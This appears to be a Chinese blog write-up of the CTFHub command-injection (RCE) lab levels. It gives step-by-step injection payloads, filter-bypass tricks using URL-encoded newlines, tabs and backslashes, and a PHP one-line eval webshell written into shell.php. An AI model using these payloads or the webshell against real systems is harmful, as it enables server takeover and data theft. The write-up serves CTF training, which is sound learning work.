CTFhub-RCE

最新推荐文章于 2024-03-27 16:11:41 发布
最新推荐文章于 2024-03-27 16:11:41 发布
阅读量490 收藏
点赞数 1
文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51706044/article/details/117425566
版权

文章目录

RCE

在开始之前我们进行一些简单的了解,其实我也是做题做到后面才发现一些知识是必要去掌握的🧚‍♂️🧚‍♀️🧛‍♀️🧛‍♂️🧜‍♀️🧜‍♀️

知识点-这里最好了解一下
RCE分为远程命令执行ping和远程代码执行evel。
漏洞出现的原因:没有在输入口做输入处理

  1. 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。
  2. 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。
  3. 其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞。

其中对于不同系统的命令指示又有着不同的命令符:

对于Windows系统

1.|”:直接执行后面的语句。
2.||”:如果前面的语句执行失败,则执行后面的语句,前面的语句只能为假才行。
3.&”:两条命令都执行,如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。
4.&&”:如果前面的语句为假则直接出错,也不执行后面的语句,前面的语句为真则两条命令都执行,前面的语句只能为真。

对于Linux系统

.;”:执行完前面的语句再执行后面的语句。
.|”:显示后面语句的执行结果。
.||”:当前面的语句执行出错时,执行后面的语句。
.&”:两条命令都执行,如果前面的语句为假则执行执行后面的语句,前面的语句可真可假。
.&&”:如果前面的语句为假则直接出错,也不执行后面的语句,前面的语句为真则两条命令都执行,前面的语句只能为真。

命令注入

在这里插入图片描述
既然提示输入IP让我们输入本地试试

127.01.01.1

在这里插入图片描述
得到显示后,尝试得到该路径下文件

127.01.01.1&ls

在这里插入图片描述
获取文件内容信息

127.01.01.1&cat 120731029228103.php

在这里插入图片描述
没有结果,这里可能是文件中包含特殊符号,使用管道运行base64加密内容

127.01.01.1&cat *.php | base64

在这里插入图片描述

尝试base64解密
在这里插入图片描述
这里还有第二种方法,利用命令执行写入一句话木马

127.0.0.1 &echo "<?php @eval(\$_POST['a']);?>" >> shell.php

因为环境问题,昨天还可以今天就不行了,但是方法是可行的!👀👀

过滤cat

本文开始前先贴出一些小知识:
linux查看文本的命令

  • cat 由第一行开始显示内容,并将所有内容输出
  • tac 从最后一行倒序显示内容,并将所有内容输出
  • more 根据窗口大小,一页一页的现实文件内容
  • lessmore类似,但其优点可以往前翻页,而且进行可以搜索字符
  • head 只显示头几行
  • tail 只显示最后几行
  • nl 类似于cat -n,显示时输出行号
  • tailf 类似于tail -f

showtime
在这里插入图片描述
根据上题的思路继续进行

127.0.0.1

在这里插入图片描述
检索目录

127.0.0.1&ls

在这里插入图片描述
先试试cat是否可以使用

127.0.0.1&cat flag_30210295964775.php

在这里插入图片描述
好吧看来是不行了
试试上一题讲到的一句话木马上传

127.0.0.1 &echo "<?php @eval(\$_POST['a']);?>" >> shell.php

在这里插入图片描述
得到flag
在这里插入图片描述

过滤空格

在这里插入图片描述
过滤空格可以使用/**/ 或者<代替

127.0.0.1/**/&/**/ls

在这里插入图片描述
使用cat进行获取

127.0.0.1/**/&/**/cat/**/flag_12333170278981.php

在这里插入图片描述
没有结果,获取flag文件下base64密文

127.0.0.1|cat<flag_12333170278981.php|base64

在这里插入图片描述
解密在这里插入图片描述

过滤目录分隔符

在这里插入图片描述
解题思路:
1、既然’/‘无法使用那我们可以使用cd 进入文件夹中
2、对管道进行使用base64加密

按照惯例对题目文件目录进行查看

127.0.0.1&ls

在这里插入图片描述
cd进入文件目录
cd 进入flag_is_here目录,
ls 显示flag_is_here目录里的内容。

127.0.0.1;cd flag_is_here;ls

在这里插入图片描述
进入该文件中获取信息
1、cd 进入文件
2、cat 获取文件内容
3、base64进行加密显示内容

127.0.0.1;cd flag_is_here;cat flag_11328226429806.php|base64

在这里插入图片描述
进行解密在这里插入图片描述

过滤运算符

在这里插入图片描述

  1. 这里过滤了,|和&两个运算符,这两种运算符在这里是无法执行后面的命令
  2. 没事问题不大👩‍💻👩‍💻👨‍💻👨‍💻我们可以使用分隔运算符进行命令

老样子,先检索目录吧

127.0.0.1;ls

在这里插入图片描述
这就把flag文本文件展现了出来,那就cat 文本内容

127.0.0.1;cat flag_14322672312813.php

在这里插入图片描述
哇哦,flag呢😡😡😡😡不要急,这次我们不用base64对内容加密获取了,我们来看看文件的源码,看看藏在哪在这里插入图片描述
这不是出来了
由于对|进行过滤了,直接对管道进行base64加密

127.0.0.1;base64 flag_14322672312813.php

在这里插入图片描述
进行解密在这里插入图片描述

综合练习

对于过滤情况的题,我发现了一个宝藏!!!
url补充表
在这里插入图片描述
在这里插入图片描述

接下来我们来进行解题吧在这里插入图片描述
可以看到本题过滤了:/ \ & ; cat flag ctfhub这些运算符
在本题中

1、使用%0a代替换行符
2、使用%09a替代TABJ补充被过滤的flag
3%5c 代替 \(用 \ 来分隔开 cat ,因为 cat 也被过滤了)

检索目录

127.0.0.1%0als

在这里插入图片描述

进入到FLAG文件中

127.0.0.1%0als

在这里插入图片描述

这里%09用于补充被过滤掉的flag

接下看我们查看flag_324582491729512.php的内容信息

127.0.0.1%0acd%09*_is_here%0aca%5ct%09*_324582491729512.php
在这里因为cat被过滤了因此需要%5c将cat分隔开绕过过滤

在这里插入图片描述
查看源代码

在这里插入图片描述
或者直接对管道进行base64加密

127.0.0.1%0acd%09*_is_here%0abase64%09*_324582491729512.php

在这里插入图片描述
解密在这里插入图片描述

唤变
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
laravel-8.4.2-rce
05-28
laravel-8.4.2-rce 设置环境 git clone https://github.com/laravel/laravel.git cd laravel git checkout e849812 composer install composer require facade/ignition==2.5.1 php artisan serve 用法 python3 ...
CTFHUB-RCE
cainiao17441898的博客
03-14 327
eval执行 查看源码后发现。让把命令赋值给cmd然后执行 先看一下根目录下有什么,命令:?cmd=system(‘ls’); 再回到上一级看看。发现了flag 打开flag就行了。
CTFHub-rce
CN天狼
02-19 1214
CTFHub-rce
CTFHUB--RCE漏洞初步学习
最新发布
qq_75120258的博客
03-27 657
关于RCE,在学习过程中其实已经接触到了很多,但在学习的时候都是这儿那儿一点一点的拼接起来的,所以看了很多大佬的博客,总结了一下,打算写一篇博客,好好的整理一下自己学习RCE所学到的东西。
ctfhub RCE
2202_75317918的博客
01-27 734
ctfhub rce
CTFHub-RCE
a21536545645的博客
07-05 187
一,介绍 RCE是远程代码/命令执行,可以直接在目标主机上执行代码或者命令,危害极大。一般是因为对输入的过滤不严格导致,常见于有调用系统命令或者调用代码执行函数的地方。 二,命令注入 后台直接执行系统命,一般要结合linux,windows的管道对要执行的命令进行拼接。 过滤的话大致分为两种情况:白名单,黑名单 黑名单是过滤到一些常用的参数,如果过滤的不全面可以考虑用其他相同功能的函数代替;如果黑名单比较全面,那就要考虑用编码的方式尝试绕过。 白名单是限制参数的使用范围,写死了的话应该常规的办法就没有用了
CTFHUBRCE(特详解)
小宇的web博客
06-15 3545
CTFHUBRCE 1.eval执行 1.先看一下靶机环境 2.先看一下php代码,这里要求将命令赋值给cmd然后执行 先看一下根目录文件/?cmd=system(“ls”); 这里的分号不能省略 没有有用的文件。查看上一级的文件夹/?cmd=system(“ls %20/”); 3.这里在进行抓取flag片段/?cmd=system(“cat%20/flag_29475”); 2.文件包含 1.先看靶机环境,点击shell会出现以下的页面,然后使用火狐的hackbar来进行postdata的注入
CVE-2021-21972-vCenter-6.5-7.0-RCE-POC
03-04
CVE-2021-21972-vCenter-6.5-7.0-RCE-POCpoc只需验证某人的路径的返回状态POC仅用于测试,未添加EXP模块POC仅用于测试,未加入exp模块
Python-Pickle-RCE-Exploit:具有易受攻击的Flask App的简单RCE PoC
03-17
Python-Pickle-RCE-漏洞利用 具有易受攻击的Flask应用程序的简单RCE Pickle PoC 在Python中,pickle模块可让您序列化和反序列化数据。 从本质上讲,这意味着您可以将Python对象转换为字节流,然后稍后在其他进程或...
spring-boot-upload-file-lead-to-rce-tricks:spring boot Fat Jar 应用文件上传漏洞到 RCE 的利用技巧
04-12
spring-boot-upload-file-lead-to-rce-tricks一. docker 漏洞环境搭建docker pull landgrey/spring-boot-fat-jar-write-file-rce:1.2docker run -d -p 18081:18081 landgrey/spring-boot-fat-jar-write-file-rce:1.2...
Apache-Solr-RCE-via-Velocity-template
03-09
Apache-Solr-RCE-Velocity模板突破产生原因:当攻击者可以直接访问Solr控制台时,可以通过发送类似/例程名/ config的POST请求该例程的配置文件进行更改。 Apache Solr内置IntegratedVelocityResponseWriter插件,在...
CTFHub----RCE
qq_44418229的博客
06-09 500
CTFHub----RCE
CTFHubRCE
cxiaodi的博客
05-07 1436
ctfhubRCE专题)
CTFHUB 文件包含 RCE
nai_kai的博客
06-17 5852
CTFHUB 文件包含 ctfhub RCE 文件包含 write up 审计一下代码,铁铁们可以百度一下strpos()的漏洞哦 #函数查找字符串在另一字符串中第一次出现的位置(区分大小写) strpos("You love php, I love php too!","php"); “我有一个shell,怎么用?” 这个是题目给的包含文件 #request = post + get 于是构造payload,往ctfhub里传参 http://challenge-2bfb323ac5bd651f
CTF学习)CTFHUB-WEB-RCE
weixin_43486981的博客
08-14 4826
CTFHUB-WEB-RCERCEeval执行文件包含strpos()的漏洞php://input知识点 php://input远程包含读取源代码php://filter命令注入linux中命令的链接符号过滤catlinux查看文本的命令过滤空格过滤目录分隔符过滤运算符综合过滤练习 RCE RCE英文全称:remote command/code execute(远程命令/代码执行漏洞) 分为远程命令执行ping和远程代码执行evel。 漏洞出现的原因:没有在输入口做输入处理。 我们常见的路由器、防火墙、入侵
CTFHub 技能树rce
weixin_63231007的博客
05-18 1125
前言 最近临近期末考试了,所以打算抽取时间来复习一下高数,线代,不然就要挂科了😭 后面难一些的地方后面再继续练习学习。但是学习也不能停搁,周六学校的战队也要进行纳新面试了,因此那就借CTFHub技能树,综合做一下刚开始学习时的一些基础漏洞,也算是回顾复习一下🐱‍👤 (1) eval执行 eval()函数 eval()函数中的eval是evaluate的简称,这个函数的作用就是把一段字符串当作PHP语句来执行 <?php if (isset($_REQUEST['cmd'...
CTFhub-RCE漏洞详解
qq_49422880的博客
05-19 2406
CTFHUB-RCE漏洞详解(一)一、eval执行二、文件包含三、php://input   RCE英文全称:remote command/code execute(远程命令/代码执行漏洞)是互联网的一种安全漏洞。   它可以让攻击者直接向后台服务器远程注入操作系统命令,相当于直接操控服务器电脑的cmd命令行!从而操控后台系统,高危漏洞!   RCE漏洞产生的根本原因:服务器像php环境版本对可执行变量函数没有做过滤,导致在没有自定义相对路径的情况下就运行命令去执行,从而导致服务器被入侵。 一、eval执行
CTFHub 技能树-- RCE(详解)
m0_62879498的博客
02-20 5021
CTFHubRCE RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统 eval执行文件 查看一开始的源代码: <?php if(isset($_REQUEST['cmd'])){ eval($_REQUEST['cmd']); } else{ highlight_file(__FILE__); } ?> php函数意思是: 是否由变量cmd 如果有,就执行eval($_REQUEST['cmd
CTFHub
qq_51553814的博客
06-08 684
CTFHub备份文件下载 vim缓存 原理: 在创建vim时回产生缓存文件,退出时就会删除,若异常退出,会产生.swp,.swo,.swn等缓存文件 以 index.php 为例: 第一次产生的交换文件名为 .index.php.swp 当index.php.swp意外退出时,将会产生名为 .index.php.swo 的交换文件 第三次意外退出时产生的交换文件则为 .index.php.swn 做题方法: 在url后加上.index.php.swp(前面有个.,这是访问这类隐藏文件的方法) 之后可获得一个
ctfhub rce
09-01
你想了解关于 CTFHubRCE(远程命令执行)相关内容吗?CTFHub 是一个针对CTF(Capture The Flag)竞赛的学习平台,而RCE是一种常见的漏洞类型之一。在CTFHub上,你可以学习如何发现和利用RCE漏洞来获取系统权限。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值